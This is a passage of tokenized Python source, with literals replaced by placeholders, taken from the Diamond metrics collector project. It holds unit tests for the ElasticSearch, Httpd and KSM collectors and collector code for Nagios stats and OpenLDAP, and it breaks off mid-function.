) ) <EOL> self . collector . config [ '<STR_LIT>' ] = True <EOL> urlopen_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> urlopen_mock . stop ( ) <EOL> self . assertEqual ( urlopen_mock . new . call_count , <NUM_LIT:3> ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data_logstash_mode ( self , publish_mock ) : <EOL> returns = [ <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> ] <EOL> urlopen_mock = patch ( '<STR_LIT>' , Mock ( <EOL> side_effect = lambda * args : returns . pop ( <NUM_LIT:0> ) ) ) <EOL> self . collector . config [ '<STR_LIT>' ] = True <EOL> urlopen_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> urlopen_mock . stop ( ) <EOL> self . assertEqual ( urlopen_mock . new . call_count , <NUM_LIT:2> ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_0_90_data ( self , publish_mock ) : <EOL> returns = [ <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> ] <EOL> urlopen_mock = patch ( '<STR_LIT>' , Mock ( <EOL> side_effect = lambda * args : returns . pop ( <NUM_LIT:0> ) ) ) <EOL> urlopen_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> urlopen_mock . stop ( ) <EOL> self . assertEqual ( urlopen_mock . new . call_count , <NUM_LIT:2> ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:12> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_fail_gracefully ( self , publish_mock ) : <EOL> urlopen_mock = patch ( '<STR_LIT>' , Mock ( <EOL> return_value = self . getFixture ( '<STR_LIT>' ) ) ) <EOL> urlopen_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> urlopen_mock . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_multi_instances_with_real_data ( self , publish_mock ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] } ) <EOL> self . collector = ElasticSearchCollector ( config , None ) <EOL> self . assertEqual ( len ( self . collector . instances ) , <NUM_LIT:2> ) <EOL> returns = [ <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> ] <EOL> urlopen_mock = patch ( '<STR_LIT>' , Mock ( <EOL> side_effect = lambda * args : returns . pop ( <NUM_LIT:0> ) ) ) <EOL> urlopen_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> urlopen_mock . stop ( ) <EOL> self . assertEqual ( urlopen_mock . new . call_count , <NUM_LIT:4> ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:8> , <EOL> } <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from httpd import HttpdCollector <EOL> import httplib <EOL> class TestHTTPResponse ( httplib . HTTPResponse ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def read ( self ) : <EOL> pass <EOL> class TestHttpdCollector ( CollectorTestCase ) : <EOL> def setUp ( self , config = None ) : <EOL> if config is None : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' <EOL> } ) <EOL> else : <EOL> config = get_collector_config ( '<STR_LIT>' , config ) <EOL> self . collector = HttpdCollector ( config , None ) <EOL> self . HTTPResponse = TestHTTPResponse ( ) <EOL> httplib . HTTPConnection . request = Mock ( return_value = True ) <EOL> httplib . HTTPConnection . getresponse = Mock ( <EOL> return_value = self . HTTPResponse ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( HttpdCollector ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_synthetic_data ( self , publish_mock ) : <EOL> self . setUp ( ) <EOL> patch_read = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> patch_headers = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = { } ) ) <EOL> patch_headers . start ( ) <EOL> patch_read . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_read . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_read = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> patch_read . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_read . stop ( ) <EOL> patch_headers . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> self . setUp ( ) <EOL> patch_read = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> patch_headers = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = { } ) ) <EOL> patch_headers . start ( ) <EOL> patch_read . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_read . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_read = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> patch_read . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_read . stop ( ) <EOL> patch_headers . stop ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_multiple_servers ( self , publish_mock ) : <EOL> self . setUp ( config = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } ) <EOL> patch_read = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> patch_headers = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = { } ) ) <EOL> patch_headers . start ( ) <EOL> patch_read . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_read . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_read = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> patch_read . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_read . stop ( ) <EOL> patch_headers . stop ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_issue_456 ( self , publish_mock ) : <EOL> self . setUp ( config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> patch_read = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> patch_headers = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = { } ) ) <EOL> patch_headers . start ( ) <EOL> patch_read . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_read . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_read = patch . object ( <EOL> TestHTTPResponse , <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> patch_read . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_read . stop ( ) <EOL> patch_headers . stop ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_issue_533 ( self , publish_mock ) : <EOL> self . setUp ( config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> expected_urls = { '<STR_LIT:localhost>' : '<STR_LIT>' } <EOL> self . assertEqual ( self . collector . urls , expected_urls ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_url_with_port ( self , publish_mock ) : <EOL> self . setUp ( config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> expected_urls = { '<STR_LIT:localhost>' : '<STR_LIT>' } <EOL> self . assertEqual ( self . collector . urls , expected_urls ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_url_without_port ( self , publish_mock ) : <EOL> self . setUp ( config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> expected_urls = { '<STR_LIT:localhost>' : '<STR_LIT>' } <EOL> self . assertEqual ( self . collector . urls , expected_urls ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_url_without_nickname ( self , publish_mock ) : <EOL> self . setUp ( config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> expected_urls = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertEqual ( self . collector . urls , expected_urls ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_issue_538 ( self , publish_mock ) : <EOL> self . setUp ( config = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> expected_urls = { '<STR_LIT:localhost>' : '<STR_LIT>' } <EOL> self . assertEqual ( self . collector . urls , expected_urls ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import os <EOL> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from ksm import KSMCollector <EOL> class TestKSMCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : os . path . dirname ( __file__ ) + '<STR_LIT>' <EOL> } ) <EOL> self . collector = KSMCollector ( config , None ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( KSMCollector ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_synthetic_data ( self , publish_mock ) : <EOL> self . collector . collect ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import diamond . collector <EOL> import subprocess <EOL> import os <EOL> from diamond . collector import str_to_bool <EOL> class NagiosStatsCollector ( diamond . collector . Collector ) : <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( NagiosStatsCollector , <EOL> self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( NagiosStatsCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' <EOL> } ) <EOL> return config <EOL> def collect ( self ) : <EOL> if ( not os . access ( self . config [ '<STR_LIT>' ] , os . X_OK ) <EOL> or ( str_to_bool ( self . config [ '<STR_LIT>' ] ) <EOL> and not os . access ( self . config [ '<STR_LIT>' ] , os . X_OK ) ) ) : <EOL> return <EOL> command = [ self . config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , "<STR_LIT:U+002C>" . join ( self . config [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' ] <EOL> if str_to_bool ( self . config [ '<STR_LIT>' ] ) : <EOL> command . insert ( <NUM_LIT:0> , self . config [ '<STR_LIT>' ] ) <EOL> p = subprocess . Popen ( command , <EOL> stdout = subprocess . PIPE ) . communicate ( ) [ <NUM_LIT:0> ] [ : - <NUM_LIT:1> ] <EOL> for i , v in enumerate ( p . split ( "<STR_LIT:\n>" ) ) : <EOL> metric_name = self . config [ '<STR_LIT>' ] [ i ] <EOL> metric_value = int ( v ) <EOL> self . publish ( metric_name , metric_value ) </s>
<s> """<STR_LIT>""" <EOL> import diamond . collector <EOL> try : <EOL> import ldap <EOL> except ImportError : <EOL> ldap = None <EOL> class OpenLDAPCollector ( diamond . collector . Collector ) : <EOL> STATS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> } <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( OpenLDAPCollector , self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT:port>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( OpenLDAPCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT:port>' : <NUM_LIT> , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' , <EOL> } ) <EOL> return config <EOL> def get_datapoints ( self , ldap_url , username , password ) : <EOL> datapoints = { } <EOL> conn = ldap . initialize ( ldap_url ) <EOL> conn . start_tls_s ( ) <EOL> conn . simple_bind_s ( username , password ) <EOL> try : <EOL> for key in self . STATS . keys ( ) : <EOL> base = self . STATS [ key ] [ '<STR_LIT>' ] <EOL> attr = self . STATS [ key ] [ '<STR_LIT>' ] <EOL> num = conn . search ( base , ldap . SCOPE_BASE , <EOL> '<STR_LIT>' , [ attr ] ) <EOL> result_type , result_data = conn . result ( num , <NUM_LIT:0> ) <EOL> datapoints [ key ] = int ( result_data [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ attr ] [ <NUM_LIT:0> ] ) <EOL> except : <EOL> self . log . warn ( '<STR_LIT>' <EOL> % ( base , attr ) ) <EOL> raise <EOL> return datapoints <EOL> def collect ( self ) : <EOL> if ldap is None : <EOL> self . log . error ( '<STR_LIT>' ) <EOL> return { } <EOL> ldap_url = '<STR_LIT>' % ( self . config [ '<STR_LIT:host>' ] , <EOL> int ( self . config [ '<STR_LIT:port>' ] ) ) <EOL> try : <EOL> datapoints = self . get_datapoints ( 